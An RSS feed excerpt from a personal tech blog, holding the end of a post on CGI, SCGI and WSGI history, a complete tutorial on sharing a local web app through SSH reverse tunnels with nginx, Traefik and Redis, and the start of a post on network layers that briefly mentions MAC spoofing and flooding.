<p>Around 1997, PHP 3 and the mod_php Apache module were released. At least based on my web archive findings, I concluded that mod_php came with PHP 3, but I'm not entirely sure. It's probably not that relevant to the story.</p>
<p>In the case of mod_php, the PHP interpreter runs inside the Apache process and executes the PHP files there. The tighter integration has its advantages, because you don't have to start a new process per request, but it has its drawbacks as well: the PHP interpreter occupies memory in the Apache processes even when the request is for a static file.</p>
<p>All in all, however, we can say it was quite successful, and to date, it is the recommended way to run PHP code with an Apache web server.</p>
<h4>Simple Common Gateway Interface</h4>
<p>Apparently, FastCGI still wasn't simple enough, so a new competitor, SCGI, was introduced around 2001. The <a href="https://github.com/nascheme/scgi/blob/main/doc/protocol.txt">SCGI protocol</a> is much simpler, but a connection can only carry one request at a time.</p>
<p>For comparison, I have written <a href="https://github.com/deadlime/cgi-playground/blob/main/bin/scgi_server.py">a simple little SCGI server</a> in Python as well that works similarly to the FastCGI server.</p>
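<p>The difference in complexity is easy to see in code. Based on the protocol description linked above, a request is a netstring of NUL-separated header names and values (<code>CONTENT_LENGTH</code> first, plus an <code>SCGI</code> header with the value <code>1</code>), followed by the body. A minimal Python sketch, with hypothetical function names:</p>
<pre><code class="hljs python">def encode_scgi_request(headers, body):
    # CONTENT_LENGTH must be the first header, and an SCGI header with value 1 is required
    items = [('CONTENT_LENGTH', str(len(body))), ('SCGI', '1')] + list(headers.items())
    raw = b''.join(name.encode() + b'\0' + value.encode() + b'\0' for name, value in items)
    # The headers are sent as a netstring ("LENGTH:DATA,"), followed by the body
    return str(len(raw)).encode() + b':' + raw + b',' + body


def decode_scgi_request(data):
    length, _, rest = data.partition(b':')
    length = int(length)
    raw, terminator, body = rest[:length], rest[length:length + 1], rest[length + 1:]
    if terminator != b',':
        raise ValueError('malformed netstring')
    # NUL-separated names and values; the trailing NUL leaves an empty last item
    fields = raw.split(b'\0')[:-1]
    headers = {name.decode(): value.decode() for name, value in zip(fields[0::2], fields[1::2])}
    return headers, body[:int(headers['CONTENT_LENGTH'])]


request = encode_scgi_request(
    {'REQUEST_METHOD': 'POST', 'REQUEST_URI': '/deepthought'},
    b'What is the answer to life?',
)
print(request)
print(decode_scgi_request(request))
</code></pre>
<p>The encoded request starts with <code>70:</code>, the same header length as the example in the protocol description. There are no record types, request IDs, or padding: one connection, one request.</p>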
<h4>FastCGI, second round</h4>
<p>In 2010, 15 years after the protocol's release, the <a href="https://www.php.net/manual/en/install.fpm.php">FastCGI Process Manager</a> (FPM) became part of PHP (in version 5.3.3). Before that, PHP's FastCGI support came from the <code>php-cgi</code> binary.</p>
<p>Meanwhile, some people got tired of Apache being too slow (a recurring theme throughout our story), and back in 2004 they brought us the Nginx web server. Now we have a decent alternative to Apache and mod_php in the form of Nginx and PHP-FPM.</p>
<h3>The world is changing</h3>
<p>As time went by, more and more languages wanted to be web-compatible. In 2003 came Python with <a href="https://peps.python.org/pep-0333/">WSGI</a>, and in 2004 Ruby on Rails was released, which could initially run as CGI, FastCGI, or later with mod_ruby. Then in 2007 came Rack, which is a similar interface to WSGI for Ruby.</p>
<p>Roughly, this works as follows: the HTTP request data arrives from somewhere (a web server written in the language, CGI, FCGI, whatever), gets transformed into the unified structure defined by the language's web interface, and is then passed to the application.</p>
<p>For Python, for example, this might look like this:</p>
<pre><code>HTTP request -&gt; Gunicorn -&gt; WSGI environment -&gt; Flask -&gt; the code we wrote
</code></pre>
<p>For Ruby, something like this:</p>
<pre><code>HTTP request -&gt; Unicorn -&gt; Rack environment -&gt; Sinatra -&gt; the code we wrote
</code></pre>
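<p>To show how close this is to CGI, here's a small WSGI application (a sketch using only the standard library, not Flask). The <code>environ</code> dictionary uses the same names as the CGI environment variables, and the request body is read from <code>wsgi.input</code> instead of standard input. The application is called directly, roughly the way a server like Gunicorn would call it, with <code>wsgiref.util.setup_testing_defaults</code> filling in the remaining required keys:</p>
<pre><code class="hljs python">import io
from wsgiref.util import setup_testing_defaults


def app(environ, start_response):
    # Same names as the CGI environment variables
    method = environ['REQUEST_METHOD']
    query = environ.get('QUERY_STRING', '')
    length = int(environ.get('CONTENT_LENGTH') or 0)
    # The body comes from wsgi.input instead of standard input
    body = environ['wsgi.input'].read(length).decode()
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [f'method={method}\nquery={query}\nbody={body}\n'.encode()]


environ = {
    'REQUEST_METHOD': 'POST',
    'QUERY_STRING': 'foo=bar',
    'CONTENT_LENGTH': '7',
    'wsgi.input': io.BytesIO(b'foo=bar'),
}
setup_testing_defaults(environ)  # adds SERVER_NAME, wsgi.version and friends

responses = []


def start_response(status, headers):
    # Simplified: a real server's start_response also returns a write() callable
    responses.append((status, headers))


body = b''.join(app(environ, start_response))
print(responses[0][0])
print(body.decode())
</code></pre>
<p>The same <code>app</code> could also be served with <code>wsgiref.simple_server.make_server('127.0.0.1', 8000, app).serve_forever()</code>, or even run as a plain CGI script with <code>wsgiref.handlers.CGIHandler().run(app)</code>.</p>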
<p>While in theory the HTTP request could come from several sources, in practice, web servers written in the language of choice seem to have won. Interestingly, this is where we start to move away from the technologies invented earlier. Why implement a complicated HTTP server when there is a simpler alternative? Wouldn't an FCGI or SCGI server have been enough? Who knows.</p>
<h3>Modern web development</h3>
<p>Around 2009, Node.js was released, once again because someone felt that Apache was too slow and couldn't handle enough requests. Go was also released around that time. Both languages included an HTTP server in their standard library, which I think decided how web applications would be developed in these languages.</p>
<p>The general solution was to write frameworks around the built-in HTTP server, and applications would use those frameworks, so each application became its own web server.</p>
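<p>Python also ships a (much more modest) HTTP server in its standard library, so the "application is its own web server" idea can be sketched without any framework. This is only an illustration with <code>http.server</code>, which the Python documentation itself does not recommend for production. It starts the server on a free port in a background thread and makes a single request to it:</p>
<pre><code class="hljs python">import threading
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer


class HelloHandler(BaseHTTPRequestHandler):
    # The application speaks HTTP itself, there is no CGI or FastCGI layer in between
    def do_GET(self):
        body = f'Hello World!\npath={self.path}\n'.encode()
        self.send_response(200)
        self.send_header('Content-Type', 'text/plain')
        self.send_header('Content-Length', str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass  # keep the demo quiet


server = HTTPServer(('127.0.0.1', 0), HelloHandler)  # port 0: let the OS pick a free port
threading.Thread(target=server.serve_forever, daemon=True).start()

port = server.server_address[1]
opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore proxy settings
with opener.open(f'http://127.0.0.1:{port}/hello?foo=bar') as response:
    text = response.read().decode()

server.shutdown()
server.server_close()
print(text)
</code></pre>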
<p>Of course, the world has changed a lot in that time. Large applications have been split up into many small applications, where it has become increasingly rare to return full or partial HTML pages (so much so that rendering templates on the server side is a novelty for the newer generation), and so the needs have changed as well.</p>
<p>There are usually already some proxies in front of applications (HAProxy, Nginx, Traefik, and others) that deal mostly with HTTP requests, so it would just be an extra (probably unnecessary) moving part in the system to have another HTTP server in front of the application, whose only job is to translate from HTTP to, say, FCGI.</p>
<p>There's a good chance that optimization doesn't matter as much as it used to either. You don't necessarily have to have the HTTP server written in C, a Python implementation can still provide the performance you need.</p>
<h3>Summary</h3>
<p>We've come a long way, and perhaps forgotten a lot during the journey, but the things mentioned above are still alive and well (or at least functional), and you can even try them out with the related <a href="https://github.com/deadlime/cgi-playground">CGI playground</a> repository. There may even be cases where they are worth using. It would be a shame to waste a Kubernetes cluster on a problem that a CGI script can solve without an issue.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Light at the end of the tunnel</title>
            <link>https://deadlime.hu/en/2023/10/29/light-at-the-end-of-the-tunnel/</link>
            <pubDate>Sun, 29 Oct 2023 10:13:38 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[Traefik]]></category>
                    <category><![CDATA[SSH]]></category>
                    
            <guid isPermaLink="false">20c6a99deec011d2a18fa140e39a29c2</guid>
            <description>Accessing your local machine from the Internet through SSH</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/tunnel_and_pipes.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>

<p>Sometimes we want to give someone access to something running on our computer. Say you're developing an application and want to share its current state with someone, without having to push every little change and wait for the build to finish before the changes show up on the staging environment.</p>
<p>Depending on the network, this can be a rather complicated operation (firewalls, port forwarding, NAT traversal). Perhaps that's why there are services to solve this problem (<a href="https://github.com/anderspitman/awesome-tunneling">quite a few, actually</a>), but it wouldn't be a very interesting post if we went in that direction.</p>
<p>Rather, we will try to look for common household items that can solve this problem. One such tool is the SSH client, which almost everyone has at the bottom of their drawer (especially since it's been part of Windows for a while). In addition, we'll need a <del>parchment-lined baking sheet</del> publicly available server (like a cheap VPS from a cloud provider) and we're ready to get this party started.</p>
<h3>Easy mode</h3>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/tunnel_1.png" width="660" height="270" alt="" title="" loading="lazy" />
</p>

<p>Say we have an application on the local machine that waits for incoming connections on <code>127.0.0.1:8080</code>. We will simulate it with a simple Python HTTP server:</p>
<pre><code class="hljs shell">local:~$ mkdir fake-app
local:~$ cd fake-app
local:~/fake-app$ echo 'hello world' &gt;index.html
local:~/fake-app$ python -m http.server -b 127.0.0.1 8080
Serving HTTP on 127.0.0.1 port 8080 (http://127.0.0.1:8080/) ...
</code></pre>
<p>Let's grab another terminal and try it out:</p>
<pre><code class="hljs shell">local:~$ curl 127.0.0.1:8080
hello world
</code></pre>
<p>We also have a VPS, which we named <code>tunnel.example.org</code>. With this setup, we can issue the following command on our local machine:</p>
<pre><code class="hljs shell">local:~$ ssh -R 8080:127.0.0.1:8080 user@tunnel.example.org
</code></pre>
<p>This will allow us to access our local application on the tunnel machine on port <code>8080</code> (SSH remote port forwarding). You can try this on the tunnel machine:</p>
<pre><code class="hljs shell">tunnel:~$ curl 127.0.0.1:8080
hello world
</code></pre>
<p>SSH will bind to <code>127.0.0.1</code> on the server (probably for security reasons), so we won't be able to access the application from outside, even if our firewall rules would otherwise allow it.</p>
<pre><code class="hljs shell">local:~$ curl tunnel.example.org:8080
curl: (7) Failed to connect to tunnel.example.org port 8080 after 30 ms: Couldn't connect to server
</code></pre>
<p>This can be circumvented by setting <code>GatewayPorts</code> to <code>clientspecified</code> in <code>/etc/ssh/sshd_config</code> (and reloading sshd), then slightly modifying our ssh command:</p>
<pre><code class="hljs shell">local:~$ ssh -R 0.0.0.0:8080:127.0.0.1:8080 user@tunnel.example.org
</code></pre>
<p>Now this should work if you also have the right firewall settings:</p>
<pre><code class="hljs shell">local:~$ curl tunnel.example.org:8080
hello world
</code></pre>
<p>It may be a good solution for your own use, but it would be a bit more elegant to stick with the first version and start an nginx on the tunnel machine instead, which forwards requests to <code>127.0.0.1:8080</code>:</p>
<pre class="file"><code>/etc/nginx/sites-available/tunnel
</code></pre>
<pre><code>server {
    listen 80;
    server_name tunnel.example.org;

    location / {
        proxy_pass http://127.0.0.1:8080/;
    }
}
</code></pre>
<p>Enabling the site and reloading the nginx configuration:</p>
<pre><code class="hljs shell">tunnel:~# ln -s /etc/nginx/sites-available/tunnel /etc/nginx/sites-enabled/
tunnel:~# systemctl reload nginx
</code></pre>
<p>And we're done:</p>
<pre><code class="hljs shell">local:~$ curl tunnel.example.org
hello world
</code></pre>
<p>Maybe nginx seems like overkill in this situation, but once it's there, we can use it for other things as well:</p>
<ul>
<li>a custom error page if the local application is not running or we are not connected via ssh</li>
<li>logging</li>
<li>HTTPS between nginx and external clients</li>
<li>mTLS between the local application and nginx (this would probably need another nginx on the local machine as well)</li>
<li>basic authentication for external clients</li>
</ul>
<p>There you have it, our simple solution, using a not-too-complicated SSH command to share your local application with others. The only drawback is that only one person can use it to share only one application on a fixed address. Probably 99% of the time this will be enough, but let's look at a slightly more complicated solution. Just for the fun of it.</p>
<h3>Advanced mode</h3>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/tunnel_2.png" width="660" height="270" alt="" title="" loading="lazy" />
</p>

<p>There is a nice feature in SSH: if you set the remote port to zero in the command, the listening port is allocated dynamically on the remote machine and reported back to the client:</p>
<pre><code class="hljs shell">local:~$ ssh -R 0:127.0.0.1:8080 user@tunnel.example.org
Allocated port 41025 for remote forward to 127.0.0.1:8080

[...]
</code></pre>
<p>So, we could do something like generating a random host when connecting (<code>&lt;random&gt;.tunnel.example.org</code>), and nginx would forward requests coming to this random host to the appropriate port on the tunnel machine. This would solve our one-person/one-application problem.</p>
<p>As far as I can tell, nginx does not excel at dynamic configurations. You could generate files and reload nginx, but this solution doesn't really appeal to me. Then I remembered that Traefik is nice and dynamic: it has a provider that can configure things <a href="https://doc.traefik.io/traefik/providers/redis/">based on Redis key-values</a>, so I started to go in that direction.</p>
<p>Installing Traefik is not too friendly if you don't want to use Docker. But Docker (Swarm), on the other hand, is not too friendly about accessing services that listen on <code>127.0.0.1</code> on the host machine, so we're still better off without it.</p>
<p>There's nothing left to do but download the binary and run it somehow.</p>
<pre><code class="hljs shell">tunnel:~# mkdir -p /opt/traefik
tunnel:~# cd /opt/traefik
tunnel:/opt/traefik# wget https://github.com/traefik/traefik/releases/download/v2.10.5/traefik_v2.10.5_linux_amd64.tar.gz
tunnel:/opt/traefik# tar -xf traefik_v2.10.5_linux_amd64.tar.gz
tunnel:/opt/traefik# rm traefik_v2.10.5_linux_amd64.tar.gz
</code></pre>
<p>My first thought was to get away with just running a <code>./traefik --providers.redis.endpoints=127.0.0.1:6379 --entrypoints.web.address=:80 &amp;</code> command and letting it do its thing in the background. That would be enough to test things, but in the end, I just created a systemd service file for it.</p>
<pre class="file"><code>/etc/systemd/system/traefik.service
</code></pre>
<pre><code>[Unit]
Description=traefik
After=network-online.target
Wants=network-online.target systemd-networkd-wait-online.service

[Service]
Restart=on-abnormal
User=traefik
Group=traefik
ExecStart=/opt/traefik/traefik --providers.redis.endpoints=127.0.0.1:6379 --entrypoints.web.address=:80
CapabilityBoundingSet=CAP_NET_BIND_SERVICE
AmbientCapabilities=CAP_NET_BIND_SERVICE
NoNewPrivileges=true

[Install]
WantedBy=multi-user.target
</code></pre>
<p>To make it work, we need a <code>traefik</code> user and group, and a Redis server.</p>
<pre><code class="hljs shell">tunnel:~# adduser --disabled-login --disabled-password --no-create-home traefik
tunnel:~# apt-get install redis-server
</code></pre>
<p>Then we just have to reload the systemd configuration, and enable and start the service (so that it also comes back after a reboot).</p>
<pre><code class="hljs shell">tunnel:~# systemctl daemon-reload
tunnel:~# systemctl enable --now traefik.service
</code></pre>
<p>First of all, I wanted to reproduce the original behavior before I started to figure out the dynamic parts, so I set the following key-value pairs in Redis:</p>
<pre><code>tunnel:~# redis-cli
127.0.0.1:6379&gt; SET traefik/http/services/tunnel-service/loadbalancer/servers/0/url http://127.0.0.1:8080/
127.0.0.1:6379&gt; SET traefik/http/routers/tunnel-router/rule Host(`tunnel.example.org`)
127.0.0.1:6379&gt; SET traefik/http/routers/tunnel-router/entrypoints/0 web
127.0.0.1:6379&gt; SET traefik/http/routers/tunnel-router/service tunnel-service
</code></pre>
<p>We have a service listening on <code>127.0.0.1:8080</code> and a router rule that directs requests to <code>tunnel.example.org</code> on port <code>80</code> (the <code>web</code> entry point defined when we started Traefik) to our service. Fortunately, this worked just like the original nginx solution, so we're ready to dynamize.</p>
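<p>Before wiring it into SSH, it helps to see what the dynamic version has to produce: the same four keys as above, but with names derived from a random label and the port allocated by SSH. A small Python sketch that only builds the key-value pairs (the function name and the naming scheme are assumptions for illustration, not part of Traefik):</p>
<pre><code class="hljs python">import secrets


def tunnel_keys(port, domain='tunnel.example.org', name=None):
    # A random label (8 hex characters) gives every tunnel its own host name
    name = name or secrets.token_hex(4)
    service = f'tunnel-{name}-service'
    router = f'tunnel-{name}-router'
    host = f'{name}.{domain}'
    keys = {
        f'traefik/http/services/{service}/loadbalancer/servers/0/url': f'http://127.0.0.1:{port}/',
        f'traefik/http/routers/{router}/rule': f'Host(`{host}`)',
        f'traefik/http/routers/{router}/entrypoints/0': 'web',
        f'traefik/http/routers/{router}/service': service,
    }
    return host, keys


host, keys = tunnel_keys(41025)
print(host)
for key, value in keys.items():
    print(key, value)
</code></pre>
<p>With the <code>redis</code> Python package, something like <code>redis.Redis().mset(keys)</code> would store these, and <code>redis.Redis().delete(*keys)</code> would remove them again when the tunnel closes.</p>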
<p>My idea was based on the fact that you can specify a custom command in the <code>authorized_keys</code> file that runs on every SSH connection made with that key (Git hosting tools such as Gitolite use this to handle pull/push over SSH, for example). There we can specify a small shell script that adds the appropriate key-value pairs to Redis and then just waits until the user closes the connection. On closing, it cleans up the Redis keys it generated.</p>
<p>To do this, you may want to add a separate user so that you can continue to use SSH traditionally with your original user:</p>
<pre><code class="hljs shell">tunnel:~# adduser --disabled-password mole
</code></pre>
<p>In the <code>authorized_keys</code> file, we add a line with our SSH key:</p>
<pre class="file"><code>/home/mole/.ssh/authorized_keys
</code></pre>
<pre><code>command=&quot;/home/mole/tunnel.sh&quot;,no-X11-forwarding,no-agent-forwarding &lt;SSH key&gt;
</code></pre>
<p>The command would have a structure like this:</p>
<pre class="file"><code>/home/mole/tunnel.sh
</code></pre>
<pre><code class="hljs bash"><span class="hljs-comment">#!/bin/bash -e</span>

<span class="hljs-function"><span class="hljs-title">setup</span></span>() {
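    <span class="hljs-built_in">:</span> <span class="hljs-comment"># setup (an empty function body is a syntax error in bash, hence the no-op)</span>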
}

<span class="hljs-function"><span class="hljs-title">cleanup</span></span>() {
    <span class="hljs-comment"># cleanup</span>
    <span class="hljs-built_in">exit</span> 0
}

<span class="hljs-built_in">trap</span> <span class="hljs-string">'cleanup'</span> INT

setup
tail -f /dev/null
</code></pre>
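<p>An important part here is the <code>trap 'cleanup' INT</code>, which catches the interrupt signal sent when we close the connection with <kbd>Ctrl</kbd>+<kbd>C</kbd>, so our cleanup code can run. If the connection ends some other way (for example, the network drops), the script most likely receives a hangup signal instead, so trapping that as well (<code>trap 'cleanup' INT HUP</code>) might save us from leftover keys. The <code>tail -f /dev/null</code> part just waits till the end of time.</p>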
<p>Of course, we also need to make this file executable:</p>
<pre><code>tunnel:~# chmod +x /home/mole/tunnel.sh
</code></pre>
<p>Now we just need to find the ports that the current SSH connection has opened. To do this, we need the ID of the sshd process, which is the parent of our running script, so we can get it with the following command:</p>
<pre><code class="hljs shell">tunnel:~$ grep PPid /proc/$$/status | awk '{ print $2 }'
123263
</code></pre>
<p>In bash, <code>$$</code> is the process ID of the current shell, and the <code>/proc</code> directory contains a lot of interesting information once you know a process ID.</p>
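<p>As a side note, bash also keeps the parent's process ID in its built-in, read-only <code>$PPID</code> variable, so the <code>/proc</code> lookup could probably be replaced by it. A minimal sketch comparing the two (the function names are made up for illustration):</p>

```shell
#!/bin/bash
# Parent PID read from /proc, like the grep/awk pipeline above (Linux only)
ppid_from_proc() {
    awk '/^PPid:/ { print $2 }' "/proc/$$/status"
}

# The same value taken from bash's built-in PPID variable
ppid_builtin() {
    echo "$PPID"
}
```

<p>Both functions should print the same number, so in <code>tunnel.sh</code>, <code>PID=$PPID</code> would be a shorter alternative.</p>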
<p>Now that we have the parent process ID, we just need information about its sockets. <code>lsof</code> is a great tool for this; the only problem is that it only returns the information we need when run as <code>root</code>.</p>
<p>As a test, I added the <code>mole</code> user to sudoers to be able to run <code>lsof</code> as <code>root</code>, but I'm not sure this is a good idea from a security point of view (for example, <code>lsof</code> might have some lesser-known feature that can be abused to get a root shell).</p>
<pre class="file"><code>/etc/sudoers.d/10-mole-lsof
</code></pre>
<pre><code>mole ALL=(root) NOPASSWD: /usr/bin/lsof
</code></pre>
<p>So, now we can get the information we need:</p>
<pre><code class="hljs shell">tunnel:~$ sudo lsof -a -nPi4 -sTCP:LISTEN -p 123263
COMMAND    PID USER   FD   TYPE  DEVICE SIZE/OFF NODE NAME
sshd    123263 mole    9u  IPv4 1569356      0t0  TCP 127.0.0.1:45991 (LISTEN)
sshd    123263 mole   11u  IPv4 1569360      0t0  TCP 127.0.0.1:39421 (LISTEN)
</code></pre>
<p>It has quite a few flags: <code>-a</code> ANDs the selection filters together (by default, <code>lsof</code> ORs them), <code>-n</code> tells it not to turn IP addresses into hostnames, <code>-P</code> tells it not to turn port numbers into port names, <code>-i4</code> selects IPv4 network connections, <code>-sTCP:LISTEN</code> keeps only TCP sockets in the listening state, and <code>-p</code> specifies the process ID. With a little bit of <code>awk</code> magic, you quickly get <code>ip:port</code> pairs:</p>
<pre><code class="hljs shell">tunnel:~$ sudo lsof -a -nPi4 -sTCP:LISTEN -p 123263 | awk '/127.0.0.1:/ { print $9 }'
127.0.0.1:45991
127.0.0.1:39421
</code></pre>
<p>This gives us all the details we need to put together our script:</p>
<pre class="file"><code>/home/mole/tunnel.sh
</code></pre>
<pre><code class="hljs bash"><span class="hljs-comment">#!/bin/bash -e</span>
PID=$(grep PPid /proc/$$/status | awk <span class="hljs-string">'{ print $2 }'</span>)

<span class="hljs-built_in">declare</span> -A mapping
<span class="hljs-keyword">for</span> app <span class="hljs-keyword">in</span> $(sudo lsof -a -nPi4 -sTCP:LISTEN -p <span class="hljs-variable">$PID</span> | awk <span class="hljs-string">'/127.0.0.1:/ { print $9 }'</span>); <span class="hljs-keyword">do</span>
  mapping[$(pwgen -A0sBv 10 1)]=<span class="hljs-string">"<span class="hljs-variable">$app</span>"</span>
<span class="hljs-keyword">done</span>

<span class="hljs-function"><span class="hljs-title">setup</span></span>() {
    <span class="hljs-keyword">for</span> key <span class="hljs-keyword">in</span> <span class="hljs-string">"<span class="hljs-variable">${!mapping[@]}</span>"</span>; <span class="hljs-keyword">do</span>
        redis-cli &lt;&lt;EOF &gt;/dev/null
MULTI
SET traefik/http/services/<span class="hljs-variable">${key}</span>-service/loadbalancer/servers/0/url http://<span class="hljs-variable">${mapping[$key]}</span>/
SET traefik/http/routers/<span class="hljs-variable">${key}</span>-router/rule Host(\`<span class="hljs-variable">${key}</span>.tunnel.example.org\`)
SET traefik/http/routers/<span class="hljs-variable">${key}</span>-router/entrypoints/0 web
SET traefik/http/routers/<span class="hljs-variable">${key}</span>-router/service <span class="hljs-variable">${key}</span>-service
EXEC
EOF
        <span class="hljs-built_in">echo</span> <span class="hljs-string">"http://<span class="hljs-variable">${key}</span>.tunnel.example.org/ -&gt; <span class="hljs-variable">${mapping[$key]}</span>"</span>
    <span class="hljs-keyword">done</span>
}

<span class="hljs-function"><span class="hljs-title">cleanup</span></span>() {
    <span class="hljs-keyword">for</span> key <span class="hljs-keyword">in</span> <span class="hljs-string">"<span class="hljs-variable">${!mapping[@]}</span>"</span>; <span class="hljs-keyword">do</span>
        redis-cli &lt;&lt;EOF &gt;/dev/null
MULTI
DEL traefik/http/routers/<span class="hljs-variable">${key}</span>-router/rule
DEL traefik/http/routers/<span class="hljs-variable">${key}</span>-router/entrypoints/0
DEL traefik/http/routers/<span class="hljs-variable">${key}</span>-router/service
DEL traefik/http/services/<span class="hljs-variable">${key}</span>-service/loadbalancer/servers/0/url
EXEC
EOF
    <span class="hljs-keyword">done</span>
    <span class="hljs-built_in">exit</span> 0
}

<span class="hljs-built_in">trap</span> <span class="hljs-string">'cleanup'</span> INT

setup
tail -f /dev/null
</code></pre>
<p>The only thing left to do is to try it out:</p>
<pre><code class="hljs shell">local:~$ ssh -R 0:127.0.0.1:8080 -R 0:127.0.0.1:8081 mole@tunnel.example.org
Allocated port 34021 for remote forward to 127.0.0.1:8080
Allocated port 39097 for remote forward to 127.0.0.1:8081
http://dkchdfskxz.tunnel.example.org/ -&gt; 127.0.0.1:34021
http://kzhrwsmgqk.tunnel.example.org/ -&gt; 127.0.0.1:39097
</code></pre>
<p>In another terminal, we can also try an HTTP request:</p>
<pre><code class="hljs shell">local:~$ curl http://dkchdfskxz.tunnel.example.org/
hello world
</code></pre>
<p>As you can see, on the tunnel side we only know the random port that sshd has assigned to us, not which port it corresponds to on the local machine. Luckily, the SSH client prints that out, so we can put the whole chain together, but it can be a bit inconvenient with multiple remote forwards.</p>
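<p>To make this a bit less inconvenient, the two sets of lines could be joined mechanically. A minimal sketch, assuming the exact output format shown above; <code>join_forwards</code> is a hypothetical helper, not part of the setup:</p>

```shell
#!/bin/bash
# Read the lines printed during the ssh session on stdin and print each public
# URL next to the local address that the tunnel ends up at.
join_forwards() {
    awk '
        # "Allocated port 34021 for remote forward to 127.0.0.1:8080"
        /^Allocated port / { local_target[$3] = $NF; next }
        # "http://name.tunnel.example.org/ -> 127.0.0.1:34021"
        $2 == "->" {
            n = split($3, addr, ":")
            port = addr[n]
            if (port in local_target) print $1, "->", local_target[port]
            else print
        }
    '
}
```

<p>For example, pasting the four lines printed by the session above into <code>join_forwards</code> (followed by <kbd>Ctrl</kbd>+<kbd>D</kbd>) should print each public URL next to <code>127.0.0.1:8080</code> and <code>127.0.0.1:8081</code>.</p>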
<p>Of course, there is still a lot of room for improvement here as well, such as:</p>
<ul>
<li>making sure that the random name generated by <code>pwgen</code> does not already exist in Redis</li>
<li>a periodic cleanup script to delete stuck Redis keys that are no longer working</li>
<li>HTTPS, mTLS, authentication</li>
</ul>
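<p>For the first item, one possible approach is to keep generating names until one is not in use yet. A minimal sketch, assuming the Redis key layout used in <code>tunnel.sh</code>; <code>random_name</code>, <code>key_in_use</code>, and <code>unique_name</code> are hypothetical helpers:</p>

```shell
#!/bin/bash
# Hypothetical helper: a random name, generated the same way as in tunnel.sh
random_name() {
    pwgen -A0sBv 10 1
}

# Hypothetical helper: succeeds if a router with this name already exists in Redis
# (redis-cli prints the bare integer 1 or 0 when its output is not a terminal)
key_in_use() {
    [ "$(redis-cli EXISTS "traefik/http/routers/$1-router/rule")" = "1" ]
}

# Keep generating names until one is found that is not in use yet
unique_name() {
    local name
    while :; do
        name=$(random_name)
        if ! key_in_use "$name"; then
            echo "$name"
            return 0
        fi
    done
}
```

<p>In the script, <code>mapping[$(pwgen -A0sBv 10 1)]</code> would become <code>mapping[$(unique_name)]</code>. There is still a small window between the check and the <code>SET</code>, and names generated in the same run are not checked against each other, so this makes collisions less likely rather than impossible.</p>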
<h3>Summary</h3>
<p>As is usually the case, it is probably not worth building your own solution from scratch for a system used daily by several people, when there are so many ready-made solutions available. However, it can never hurt to know how such a system works under the hood.</p>
<p>The easy mode trick may be worth keeping in mind; it might even prove useful in the future. SSH is a fantastic thing.</p>

]]></content:encoded>
        </item>
            <item>
            <title>Lost in the network</title>
            <link>https://deadlime.hu/en/2023/09/30/lost-in-the-network/</link>
            <pubDate>Sat, 30 Sep 2023 19:58:42 +0000</pubDate>
            
            <dc:creator><![CDATA[Nagy Krisztián]]></dc:creator>
                    <category><![CDATA[network]]></category>
                    <category><![CDATA[security]]></category>
                    
            <guid isPermaLink="false">7fd8ed9e60bc60261d47e7adf21727c5</guid>
            <description>A deep dive into the intriguing world of network packets</description>
            <content:encoded><![CDATA[<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/man_in_the_middle.jpg" width="660" height="450" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">Now with extra fingers for the more efficient hacking experience!</p>

<p>Have you ever wondered what happens behind the scenes when you send an HTTP request? How do the bits know where to go when you ping someone on the local network? Today, we will try to find answers to such questions.</p>
<p>At first, I didn't know how to approach the problem. Do I take an HTTP request and dig down to the bottom or start from the bottom until I'm able to construct an HTTP request? In the end, I decided on the latter.</p>
<p>It may be a bit more alien at the beginning, but I hope it'll make sense in the end. We'll go along the layers defined in the OSI model, so let's start with the hardware.</p>
<h3>Physical layer</h3>
<p>Chances are that you have an Ethernet network at home, something like this:</p>

<p class="image image-center">
    <img src="https://deadlime.hu/uploads/2023/lan.png" width="480" height="420" alt="" title="" loading="lazy" />
</p>
<p class="image-caption">The modem, the router, and the switch may happen to live in the same box.</p>

<p>It's called the physical layer: a bunch of network devices, tied together with copper wires (or wireless devices tied together with magic). Each network device has a unique MAC address, assigned in the factory. There's a lot more interesting stuff to look into here (like how devices agree on which speeds they support), but personally, there's not much more I can tell you about it, so let's move on to the next layer, the data link layer.</p>
<h3>Data link layer</h3>
<p>At this layer, the zeros and ones we know so well finally appear. We have what's called the Ethernet frame, which is a unit of data that we can send at a time. It looks something like this:</p>
<table>
<tbody>
  <tr>
    <td nowrap>6 bytes</td>
    <td>MAC address of the recipient</td>
  </tr>
  <tr>
    <td nowrap>6 bytes</td>
    <td>MAC address of the sender</td>
  </tr>
  <tr>
    <td nowrap>2 bytes</td>
    <td>type of the data (<code>0x0800</code> for IP, <code>0x0806</code> for ARP)</td>
  </tr>
  <tr>
    <td nowrap>46-1500 bytes</td>
    <td>the data</td>
  </tr>
  <tr>
    <td nowrap>4 bytes</td>
    <td>checksum</td>
  </tr>
</tbody>
</table>
<p>Interestingly, the sender has to state who the sender is. What happens if someone else's MAC address is entered there? Is it possible to do something naughty with this?</p>
<p>There are two interesting things to note here. One is MAC spoofing, where we are not happy with the MAC address assigned by the hardware vendor and want to change it, for example, because our ISP's device only works with a specific MAC address. Android phones do something similar: by default, they connect to Wi-Fi networks with a random MAC address so that the phone cannot be tracked between networks.</p>
<p>The other interesting thing is MAC flooding, where the attacker sends frames with a bunch of random MAC addresses as senders. This fills up the switch's entire MAC address table, leaving no room for the real MAC addresses. As a result, the recipient MAC address of an incoming legitimate frame is usually not found in the table, so the switch sends the frame out to everyone. This allows attackers to peek into the contents of packets that are not intended for them.</p>
<p>The observant reader may also notice that there is no mention of the so-called IP addresses that we normally use. For that, we need to move on to the next level, which is the network layer.</p>
<h3>Network layer</h3>
<p>There are several interesting protocols to be mentioned here, all of which will be placed in the data part of the Ethernet frame. First, we need to know what MAC address is associated with a given IP address.</p>
<h4>Address Resolution Protocol</h4>
<p>ARP helps us with this: we can send a request, and the owner of the IP address can respond to it. The message structure:</p>
<table>
<tbody>
  <tr>
    <td nowrap>2 bytes</td>
